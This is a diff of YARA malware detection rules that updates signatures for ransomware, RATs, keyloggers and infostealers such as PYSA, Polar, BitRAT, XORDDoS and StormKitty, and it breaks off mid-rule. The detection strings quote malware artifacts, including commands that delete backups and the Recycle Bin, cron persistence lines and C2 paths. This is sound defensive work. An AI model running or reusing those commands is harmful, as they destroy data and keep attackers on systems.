"ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d" fullword ascii - $s4 = "Your request has been accepted. ClientID: {" ascii - $s5 = "Proxy-Connection: Keep-Alive" fullword wide - $s6 = "Content-Length: %d" fullword wide - $o0 = { f7 f9 8b c2 89 44 24 34 48 63 44 24 34 48 8b 4c } - $o1 = { 48 c7 00 ff ff ff ff 48 8b 84 24 90 } - $o2 = { f3 aa 83 7c 24 30 01 75 34 c7 44 24 20 01 } + $s1 = "JNOde\\" ascii + $s2 = "\"SomeNone" fullword ascii + $s3 = "kindmessage" fullword ascii + $s4 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writting non-UTF-8 byte sequences" ascii + $s5 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writing non-UTF-8 byte sequences" ascii + $s6 = "(os error other os erroroperation interrruptedwrite zerotimed" ascii + $s7 = "(os error other os erroroperation interruptedwrite zerotimed" ascii + $s8 = "nPipeAlreadyExistsWouldBlockInvalidInputInvalidDataTimedOutWriteZeroInterruptedOtherN" fullword ascii + $s9 = "_matherr(): %s in %s(%g, %g) (retval=%g)" ascii condition: - uint16(0)==0x5a4d and 4 of ($s*) or ( all of ($o*) and 3 of ($s*)) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Thanos : FILE +rule DITEKSHEN_MALWARE_Win_Xorist : FILE { meta: - description = "Detects Thanos / Prometheus / Spook ransomware" + description = "Detects Xorist ransomware" author = "ditekSHen" - id = "f523906e-ef5e-57be-82ed-06e75c393f42" - date = "2024-09-06" - modified = "2024-09-06" + id = "76119441-343d-51c3-90eb-9d54c80a983d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4357-L4389" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8ce7cdfe4bca31e21d6fa31a75c46737a41fae3b5b0fda818e3a4709ceaf9bf5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2057-L2078" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b34e3fa065cabcd8d26908866e53ff599631128e1da884e42a2e63d890879eaa" score = 75 - quality = 73 + quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.Xorist" strings: - $f1 = "<WorkerCrypter2>b__" ascii - $f2 = "<Encrypt2>b__" ascii - $f3 = "<Killproc>b__" ascii - $f4 = "<GetIPInfo>b__" ascii - $f5 = "<MacAddress>k__" ascii - $f6 = "<IPAddress>k__" ascii - $f7 = "<Crypt>b__" ascii - $s1 = "Aditional KeyId:" wide - $s2 = "process call create cmd.exe /c \\\\" wide - $s3 = "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin" wide - $s4 = "\\HOW_TO_DECYPHER_FILES." wide - $s5 = "Client Unique Identifier Key:" wide - $s6 = "/s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk" fullword wide - $s7 = "NtOpenProcess" fullword wide - $s8 = "Builder_Log" fullword wide - $s9 = "> Nul & fsutil file setZeroData offset=0 length=" wide - $s10 = "3747bdbf-0ef0-42d8-9234-70d68801f407" wide - $s11 = "4b195894-0f06-4fdd-afb4-b17fb9246a59" wide - $s12 = "cec564ff-2433-4771-b918-15f58ef6e26c" wide - $s13 = "56258a19-7489-468b-86ee-e7899203d67c" wide - $s14 = "WalkDirectoryTree" fullword ascii - $s15 = "hashtableLock" fullword ascii - $s16 = "get_ParentFrn" fullword ascii - $m1 = "SW5mb3JtYXRpb24uLi" wide - $m2 = "QWxsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0" wide + $x1 = { 00 4d 00 41 00 47 00 45 00 0b 00 50 00 55 00 + 53 00 53 00 59 00 4c 00 49 00 43 00 4b 00 45 + 00 52 00 } + $x2 = { 30 70 33 6e 53 4f 75 72 63 33 20 58 30 72 31 35 + 37 2c 20 6d 6f 74 68 65 72 66 75 63 6b 65 72 21 + 00 70 75 73 73 79 6c 69 63 6b 65 72 00 2e 62 6d + 70 00 2e 00 2e 2e 00 6f 70 65 6e 00 2e 65 78 65 } + $s1 = "\\shell\\open\\command" fullword ascii + $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii + $s3 = "CRYPTED!" fullword ascii + $s4 = "Attention!" fullword ascii + $s5 = "Password:" fullword ascii + $s6 = { 43 6f 6d 53 70 65 63 00 2f 63 20 64 65 6c 20 22 00 22 20 3e 3e 20 4e 55 4c } condition: - uint16(0)==0x5a4d and (5 of ($f*) or 5 of ($s*) or (4 of ($f*) and 2 of ($s*) or ( all of ($m*) and 3 of them )) or 8 of them ) + uint16(0)==0x5a4d and ( all of ($x*) or 5 of ($s*) or (1 of ($x*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Tmanager : FILE +rule DITEKSHEN_MALWARE_Win_PYSA : FILE { meta: - description = "Detects TManager RAT. Associated with TA428" + description = "Detects PYSA/Mespinoza ransomware" author = "ditekSHen" - id = "391b72bd-ddf5-5251-b566-c75c1cc16b74" - date = "2024-09-06" - modified = "2024-09-06" + id = "3a3fad6a-46bc-51dc-9723-4412034ca442" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4391-L4410" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "cdbcc00ae67c9161f6db89cfa658c8bc8fb7fab3915ac5ae99bdd34c42ee2abb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2080-L2100" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e614b827bd8d065e94852fed01497c785bf90c52c3624aff9939b3f40ecf96a4" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.PYSA" strings: - $s1 = "WSAStartup Error!" fullword wide - $s2 = "KB3112342.LOG" fullword wide - $s3 = "\\cmd.exe -c" fullword wide - $s4 = "sock_hmutex" fullword wide - $s5 = "cmd_hmutex" fullword wide - $s6 = "powershell" fullword wide - $s7 = "%s_%d.bmp" fullword wide - $s8 = "!Error!" fullword wide - $s9 = "[Execute]" fullword ascii - $s10 = "[Snapshot]" fullword ascii - $s11 = "GetLanIP error!" fullword ascii - $s12 = "chcp & exit" fullword ascii + $s1 = "%s\\Readme.README" fullword wide + $s2 = "Every byte on any types of your devices was encrypted" ascii + $s3 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 74 65 78 74 00 (50|70) (59|79) (53|73) (41|61) } + $s4 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 63 61 70 74 69 6f 6e 00 00 (50|70) (59|79) (53|73) (41|61) } + $s5 = { 2e 62 61 74 00 00 6f 70 65 6e 00 00 00 00 53 + 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f + 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 + 65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69 + 63 69 65 73 5c 53 79 73 74 65 6d 00 00 00 } + $f1 = ".?AVPK_EncryptorFilter@CryptoPP@@" ascii + $f2 = ".?AV?$TF_EncryptorImpl@" ascii + $f3 = "@VTF_EncryptorBase@CryptoPP@@" ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and all of ($f*) and 3 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Sn0Wlogger : FILE +rule DITEKSHEN_MALWARE_Win_Polar : FILE { meta: - description = "Detects Sn0w Logger" + description = "Detects Polar ransomware" author = "ditekSHen" - id = "cdb70164-3f72-553f-a6c5-190f699e0743" - date = "2024-09-06" - modified = "2024-09-06" + id = "ab4e4478-5417-5918-b5df-5b6ffe7438a9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4412-L4428" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ea4b2281f906271dc249b5036b22eadfc5add94def4f8e4f8a40c384618465d8" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2102-L2123" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4f05a8ace9a03d02f54f0ebdd5349d1d1b23db8e34aa71edd44eebf02b88745c" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.Polar" strings: - $s1 = "\\SnowP\\Example\\Secured\\" ascii - $s2 = "{0}{3}Content-Type: {4}{3}Content-Disposition: form-data; name=\"{1}\"{3}{3}{2}{3}" wide - $s3 = "\"encrypted_key\":\"(.*?)\"" fullword wide - $s4 = "<SendToDiscord>d__" ascii - $s5 = "_urlWebhook" ascii - $r1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword wide - $r2 = "^\\w+([-+.']\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*$" fullword wide - $r3 = "mfa\\.[\\w-]{84}" fullword wide - $r4 = "(\\w+)=(\\d+)-(\\d+)$" fullword wide + $s1 = "Encrypt Failed ! ErrorMessage :" wide + $s2 = ".locked" fullword wide + $s3 = ".cryptd" fullword wide + $s4 = "$SysReset" fullword wide + $s5 = "Polar.Properties.Resources" ascii wide + $s6 = "AES_EnDecryptor.Basement" fullword ascii + $s7 = "RunCMDCommand" fullword ascii + $s8 = "killerps_list" fullword ascii + $s9 = "clearlog" fullword ascii + $s10 = "encryptFile" fullword ascii + $s11 = "changeBackPictrue" fullword ascii + $pdb1 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x86\\Release\\Encode.pdb" ascii + $pdb2 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x64\\Release\\Encode.pdb" ascii condition: - uint16(0)==0x5a4d and (4 of ($s*) or ( all of ($r*) and 2 of ($s*)) or 7 of them ) + uint16(0)==0x5a4d and (8 of ($s*) or (1 of ($pdb*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Danabot : FILE +rule DITEKSHEN_MALWARE_Win_Bitrat : FILE { meta: - description = "Detects DanaBot variants" + description = "Detects BitRAT RAT" author = "ditekSHen" - id = "a49e21b9-d40a-5273-a9a2-322a1ec9bbbc" - date = "2024-09-06" - modified = "2024-09-06" + id = "9041a21f-0f27-5e90-8429-863e361381bf" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4430-L4459" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8d037b46d719159dc3e60f0c7143022ce8745cfd753c3754ae80a220a838567d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2125-L2153" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "128c3c8cea0439f272de241c77fc9ed46e64419e497091e444e98123dad059cb" score = 75 - quality = 50 + quality = 25 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.BitRAT" strings: - $s1 = "ms ie ftp passwords" fullword wide - $s2 = "CookieEntryEx_" fullword wide - $s3 = "winmgmts:\\\\localhost\\root\\cimv2" fullword wide - $s4 = "S-Password.txt" fullword wide - $s5 = "del_ini://Main|Password|" fullword wide - $s6 = "cmd.exe /c start chrome.exe --no-sandbox" wide - $s7 = "cmd.exe /c start firefox.exe -no-remote" wide - $s8 = "\\rundll32.exe shell32.dll,#" wide - $s9 = "S_Error:TORConnect" wide - $s10 = "InjectionProcess" fullword ascii - $s11 = "proxylogin" fullword wide - $s12 = "\\FS_Morff\\FS_Temp\\" wide - $ds1 = "C:\\Windows\\System32\\rundll32.exe" fullword wide - $ds2 = "PExtended4" fullword ascii - $ds3 = "%s-%s" fullword wide - $ds4 = "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF0123456789ABCDEF" fullword wide + $s1 = "\\plg\\" fullword ascii + $s2 = "klgoff_del" fullword ascii + $s3 = "files_delete" ascii + $s4 = "files_zip_start" fullword ascii + $s5 = "files_exec" fullword ascii + $s6 = "drives_get" fullword ascii + $s7 = "srv_list" fullword ascii + $s8 = "con_list" fullword ascii + $s9 = "ddos_stop" fullword ascii + $s10 = "socks5_srv_start" fullword ascii + $s11 = "/getUpdates?offset=" fullword ascii + $s12 = "Action: /dlex" fullword ascii + $s13 = "Action: /clsbrw" fullword ascii + $s14 = "Action: /usb" fullword ascii + $s15 = "/klg" fullword ascii + $s16 = "klg|" fullword ascii + $s17 = "Slowloris" fullword ascii + $s18 = "Bot ID:" ascii + $t1 = "<sz>N/A</sz>" fullword ascii + $t2 = "<silent>N/A</silent>" fullword ascii condition: - uint16(0)==0x5a4d and (7 of ($s*) or all of ($ds*)) + uint16(0)==0x5a4d and (7 of ($s*) or (4 of ($s*) and 1 of ($t*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Klackring : FILE +rule DITEKSHEN_MALWARE_Win_Poullight : FILE { meta: - description = "Detects Klackring variants. Associated with ZINC / Lazarus" + description = "Detects Poullight infostealer" author = "ditekSHen" - id = "7bd9a68f-d58b-5437-a28b-5a7f1a11038e" - date = "2024-09-06" - modified = "2024-09-06" + id = "c80143f8-9c44-5e96-b1ff-2adb4bf031e4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4461-L4475" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b894e89de720affadd80966d726a44ffce75d71095b0530edb6bfddb76660c54" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2155-L2176" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e60ffb10892d35664a088d69c965e130f87bb1a59c257d484bdfe5085074bccd" score = 75 quality = 75 tags = "FILE" + snort2_sid = "920074-920075" + snort3_sid = "920074-920075" + clamav_sig = "MALWARE.Win.Trojan.Poullight" strings: - $s1 = "%s\\%s.dll" fullword wide - $s2 = "cmd.exe /c move /Y %s %s" fullword wide - $s3 = "%s\\win32k.sys" fullword wide - $s4 = "NetSvcInst_Rundll32.dll" fullword ascii - $s5 = "Spectrum.dll" fullword ascii wide - $s6 = "%s\\cmd.exe" fullword wide - $s7 = ".?AVA5Stream@@" fullword ascii + $s1 = "zipx" fullword wide + $s2 = "{0}Windows Defender.exe" fullword wide + $s3 = "pll_test" fullword wide + $s4 = "loginusers.vdf" wide + $s5 = "Stealer by Nixscare" wide + $s6 = "path_lad" fullword ascii + $s7 = "<CheckVM>" ascii + $s8 = "Poullight.Properties" ascii + $s9 = "</ulfile>" fullword wide + $s10 = "{0}processlist.txt" fullword wide + $s11 = "{0}Browsers\\Passwords.txt" fullword wide condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and 7 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Comebacker : FILE +rule DITEKSHEN_MALWARE_Win_Snakekeylogger : FILE { meta: - description = "Detects ComeBacker variants. Associated with ZINC / Lazarus" + description = "Detects Snake Keylogger" author = "ditekSHen" - id = "d0454d09-4a15-5251-aa7a-cb00604715ca" - date = "2024-09-06" - modified = "2024-09-06" + id = "e44bf33c-916d-5dc3-ba2a-89e13f1511a2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4477-L4492" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0d806fd199f0e8e3576ca837781c2fa06f1a09d75ea16602effb72754d8e4940" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2178-L2207" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7d787026b290c3c6a43c7de83233f22980733e7401260ff2f763e6f1b534ecba" score = 75 - quality = 50 + quality = 67 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.SnakeKeylogger" strings: - $s1 = "ENGINE_get_RAND" ascii - $s2 = "./{IES" fullword ascii - $s3 = "TODO: <Company name>" fullword wide - $s4 = "@Microsoft Corperation. All rights reserved." fullword wide - $s5 = "Microsoft@Windows@Operating System" fullword wide - $x1 = "C:\\Windows\\System32\\rundll32.exe %s,%s %s %s" fullword ascii wide - $x2 = "ASN2_TYPE_new" fullword ascii wide - $x3 = "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\" fullword ascii wide + $id1 = "SNAKE-KEYLOGGER" fullword ascii + $id2 = "----------------S--------N--------A--------K--------E----------------" ascii + $s1 = "_KPPlogS" fullword ascii + $s2 = "_Scrlogtimerrr" fullword ascii + $s3 = "_Clpreptimerr" fullword ascii + $s4 = "_clprEPs" fullword ascii + $s5 = "_kLLTIm" fullword ascii + $s6 = "_TPSSends" fullword ascii + $s7 = "_ProHfutimer" fullword ascii + $s8 = "GrabbedClp" fullword ascii + $s9 = "StartKeylogger" fullword ascii + $x1 = "$%SMTPDV$" wide + $x2 = "$#TheHashHere%&" wide + $x3 = "%FTPDV$" wide + $x4 = "$%TelegramDv$" wide + $x5 = "KeyLoggerEventArgs" ascii + $m1 = "| Snake Keylogger" ascii wide + $m2 = /(Screenshot|Clipboard|keystroke) Logs ID/ ascii wide + $m3 = "SnakePW" ascii wide + $m4 = "\\SnakeKeylogger\\" ascii wide condition: - uint16(0)==0x5a4d and ( all of ($s*) or all of ($x*)) + ( uint16(0)==0x5a4d and ( all of ($id*) or 6 of ($s*) or (1 of ($id*) and 3 of ($s*)) or 4 of ($x*))) or (2 of ($m*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Suncrypt : FILE +rule DITEKSHEN_MALWARE_Linux_Xorddos : FILE { meta: - description = "Detects SunCrypt ransomware" + description = "Detects XORDDoS" author = "ditekSHen" - id = "1a28fcbf-1fc0-5f18-ae71-2e813ed0f958" - date = "2024-09-06" - modified = "2024-09-06" + id = "0ca581c3-bce2-5b4f-8146-9aeb49b88813" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4494-L4532" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "abde9bbf2577304ff059972a38e803ba17de7a1f0346efe880a710f2ad79db37" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2209-L2220" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "192378d903316c1d80b064e78feb6ed9d2ffc9e6c7dc0c8df223d83d17e4e8d9" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "-noshares" fullword wide - $s2 = "-nomutex" fullword wide - $s3 = "-noreport" fullword wide - $s4 = "-noservices" fullword wide - $s5 = "$Recycle.bin" fullword wide - $s6 = "YOUR_FILES_ARE_ENCRYPTED.HTML" fullword wide - $s7 = "\\\\?\\%c:" fullword wide - $s8 = "locker.exe" fullword ascii - $s9 = "DllRegisterServer" fullword ascii - $g1 = "main.EncFile" fullword ascii nocase - $g2 = "main.detectName" fullword ascii nocase - $g3 = "main.detectIP" fullword ascii nocase - $g4 = "main.detectDebugProc" fullword ascii nocase - $g5 = "main.Bypass" ascii nocase - $g6 = "main.allocateMemory" fullword ascii nocase - $g7 = "main.killAV" fullword ascii nocase - $g8 = "main.disableShadowCopy" fullword ascii nocase - $g9 = "main.(*windowsDrivesModel).LoadDrives" fullword ascii nocase - $g10 = "main.IsFriends" fullword ascii nocase - $g11 = "main.walkMsg" fullword ascii nocase - $g12 = "main.makeSecretMessage" fullword ascii nocase - $g13 = "main.stealFiles" fullword ascii nocase - $g14 = "main.newKey" fullword ascii nocase - $g15 = "main.openBrowser" fullword ascii nocase - $g16 = "main.killProc" fullword ascii nocase - $g17 = "main.selfRemove" fullword ascii nocase - $m1 = "<h2>\\x20Offline\\x20HowTo\\x20</h2>\\x0a\\x09\\x09\\x09\\x09<p>Copy\\x20&\\x20Paste\\x20this\\x20message\\x20to" ascii - $m2 = "\\x20restore\\x20your\\x20files." ascii - $m3 = "\\x20your\\x20documents\\x20and\\x20files\\x20encrypted" ascii - $m4 = "\\x20lose\\x20all\\x20of\\x20your\\x20data\\x20and\\x20files." ascii - $m5 = ",'/#/client/','<h2>\\x20Whats\\x20Happen" ascii + $s1 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done" fullword ascii + $s2 = "cp /lib/libudev.so /lib/libudev.so.6" fullword ascii + $s3 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" fullword ascii + $s4 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" fullword ascii condition: - uint16(0)==0x5a4d and (5 of ($s*) or 6 of ($g*) or 3 of ($m*)) + uint32(0)==0x464c457f and 3 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Zegost : FILE +rule DITEKSHEN_MALWARE_Win_Blacknet : FILE { meta: - description = "Detects Zegost" + description = "Detects BlackNET RAT" author = "ditekSHen" - id = "cce29602-c096-53df-a99b-16f18ed43b80" - date = "2024-09-06" - modified = "2024-09-06" + id = "c1ece46a-3cd9-54aa-a105-1c5b19357a7e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4534-L4560" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "96727a0f5c113e5cdfe871f104553fd1c04a8f63ecbb8db7223afb71fcdd4087" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2222-L2250" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "64e00325a5a6a595067c6133800e73d943f45e2783475c24ed4a9bd9937fe0d6" score = 75 quality = 75 tags = "FILE" + snort2_sid = "920079-920082" + snort3_sid = "920079-920082" + clamav_sig = "MALWARE.Win.Trojan.BlackNET" strings: - $s1 = "rtvscan.exe" fullword ascii - $s2 = "ashDisp.exe" fullword ascii - $s3 = "KvMonXP.exe" fullword ascii - $s4 = "egui.exe" fullword ascii - $s5 = "avcenter.exe" fullword ascii - $s6 = "K7TSecurity.exe" fullword ascii - $s7 = "TMBMSRV.exe" fullword ascii - $s8 = "RavMonD.exe" fullword ascii - $s9 = "kxetray.exe" fullword ascii - $s10 = "mssecess.exe" fullword ascii - $s11 = "QUHLPSVC.EXE" fullword ascii - $s12 = "360tray.exe" fullword ascii - $s13 = "QQPCRTP.exe" fullword ascii - $s14 = "knsdtray.exe" fullword ascii - $s15 = "V3Svc.exe" fullword ascii - $s16 = "??1_Winit@std@@QAE@XZ" fullword ascii - $s17 = "ClearEventLogA" fullword ascii - $s18 = "SeShutdownPrivilege" fullword ascii - $s19 = "%s\\shell\\open\\command" fullword ascii + $s1 = "SbieCtrl" fullword wide + $s2 = "SpyTheSpy" fullword wide + $s3 = "\\BlackNET.dat" fullword wide + $s4 = "StartDDOS" fullword wide + $s5 = "UDPAttack" fullword wide + $s6 = "ARMEAttack" fullword wide + $s7 = "TCPAttack" fullword wide + $s8 = "HTTPGetAttack" fullword wide + $s9 = "RetriveLogs" fullword wide + $s10 = "StealPassword" fullword wide + $s11 = "/create /f /sc ONSTART /RL HIGHEST /tn \"'" fullword wide + $b1 = "DeleteScript|BN|" fullword wide + $b2 = "|BN|Online" fullword wide + $b3 = "NewLog|BN|" fullword wide + $cnc1 = "/getCommand.php?id=" fullword wide + $cnc2 = "/upload.php?id=" fullword wide + $cnc3 = "connection.php?data=" fullword wide + $cnc4 = "/receive.php?command=" fullword wide condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and (9 of ($s*) or all of ($cnc*) or all of ($b*) or 12 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_GENERIC01 : FILE +rule DITEKSHEN_MALWARE_Win_Stormkitty : FILE { meta: - description = "Detects known unamed malicious executables, mostly DLLs" + description = "Detects StormKitty infostealer" author = "ditekSHen" - id = "3c16df71-f2e2-591c-b377-7e5ed697d43f" - date = "2024-09-06" - modified = "2024-09-06" + id = "a061a1c0-9ed5-5048-85df-4d7ed6995e92" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4562-L4575" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ddae979db5ddda772ca66a3d50e4b5479b16052ea002fd04fdbf295ce784e291" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2252-L2269" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5d139aad6932f177cd14e0356f822ad68ddc659ea4fabd2fd2fbcbc8bad58888" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.StormKitty" strings: - $s1 = "\\wmkawe_%d.data" ascii - $s2 = "\\resmon.resmoncfg" ascii - $s3 = "ByPassUAC" fullword ascii - $s4 = "rundll32.exe C:\\ProgramData\\Sandboxie\\SbieMsg.dll,installsvc" fullword ascii nocase - $s5 = "%s\\SbieMsg." ascii - $s6 = "Stupid Japanese" fullword ascii + $x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii + $x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii + $x3 = "StormKitty" fullword ascii + $s1 = "GetBSSID" fullword ascii + $s2 = "GetAntivirus" fullword ascii + $s3 = "C:\\Users\\Public\\credentials.txt" fullword wide + $s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide + $s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide + $s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and (2 of ($x*) or 5 of ($s*) or (3 of ($s*) and 1 of ($x*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_GENERIC02 : FILE +rule DITEKSHEN_MALWARE_Win_Bulz01 : FILE { meta: - description = "Detects known unamed malicious executables" + description = "Detects trojan loader" author = "ditekSHen" - id = "d0d24e69-0e99-5766-8e8e-9cdce902fa8f" - date = "2024-09-06" - modified = "2024-09-06" + id = "4ac4125b-70f5-5cda-ae45-fd5713e25a6e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4577-L4591" - license_url = 